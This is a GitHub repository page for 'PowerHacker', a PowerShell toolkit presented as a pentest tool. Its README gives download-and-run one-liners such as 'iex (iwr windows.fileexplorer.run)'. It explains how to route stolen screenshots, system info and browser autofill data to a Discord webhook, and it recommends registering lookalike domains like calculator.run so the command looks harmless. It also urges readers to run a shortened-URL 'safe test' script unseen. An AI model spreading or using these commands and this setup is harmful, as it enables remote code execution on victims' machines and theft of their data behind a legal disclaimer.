Skip to content

pentestfunctions/powerhacker

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
README.md
README.md
 
 
deviceinfo.ps1
deviceinfo.ps1
 
 
hypnotoad.ps1
hypnotoad.ps1
 
 
youareanidiot.ps1
youareanidiot.ps1
 
 

Repository files navigation

PowerHacker ⚡ README

Welcome to PowerHacker, a PowerShell-based toolkit designed for penetration testers and cybersecurity professionals. PowerHacker prefers utilizing valuable Top-Level Domains (TLDs) and the setup of subdomains to facilitate efficient red team operations and security assessments.

  • A simple command like iex (iwr calculator.run) is enough to give full control over a windows system.

🔒 Security Notice

Security and ethical use are paramount. PowerHacker is intended for authorized penetration testing and/or educational purposes only. Misuse of PowerHacker may result in legal consequences. Ensure you have explicit permission to test target systems with PowerHacker.

Safe test scripts: Try run either of these in a command prompt or powershell respectively:

  • (It will open your default browser across all your monitors to hypnotoad in kiosk mode)
  1. In Powershell:
  • iex (iwr t.ly/YUz2A)
  1. In CMD or press Windows key + R:
  • powershell iex (iwr t.ly/YUz2A)

⚙️ Setup

To leverage PowerHacker for your assessments:

  1. Clone the repository:

    git clone https://github.com/pentestfunctions/powerhacker.git

  2. Navigate to the PowerHacker directory:

    cd powerhacker

  3. Update the $WebhookUrl in the scripts to point to your Discord webhook for data exfiltration. To get a Discord webhook URL:

    • Create a Discord server or use an existing one.
    • Go to Server Settings > Integrations.
    • Click on "Webhooks" and then "New Webhook".
    • Customize your webhook, copy the URL, and use it in the script.

  4. Upload the ps1 file to your github account.

  5. Register a domain for best outcome, for example:

    • fileexplorer.run
    • You can also then add subdomains such as windows.fileexplorer.run
    • Some other good TLD ideas: software such as microsoft.sofware or calculator.run

🚀 Usage

PowerHacker simplifies the redirection of subdomains to your raw GitHub page containing the PowerShell code. To execute, use:

iex (iwr windows.fileexplorer.run)

This command downloads and executes the script, uploading all collected data to the specified Discord webhook.

⚠️ Features

  • TakeScreenshot: Captures the current screen.
  • Convert-JsonToWav: Converts JSON data to WAV format.
  • Get-BrowserData-AutoFill: Extracts autofill information from browsers.
  • Comprehensive System Info: Collects detailed system information, including OS version, build number, and more.

🔑 Emphasis on Security

  • Always ensure you are in compliance with all applicable laws and regulations.
  • Use PowerHacker responsibly to enhance security posture, not to undermine it.
  • Verify the integrity and confidentiality of the data collected during your assessments.

❓ Support

For questions, issues, or feature requests, use GitHub Issues within the repository.

📝 Contributing

Contributions to PowerHacker are welcome. Please submit pull requests with clear descriptions of changes and enhancements.

⚖️ License

PowerHacker is released under MIT License. By using PowerHacker, you agree to the terms of the license and acknowledge the tool's intended purpose for legal, authorized cybersecurity assessments only.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

4 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages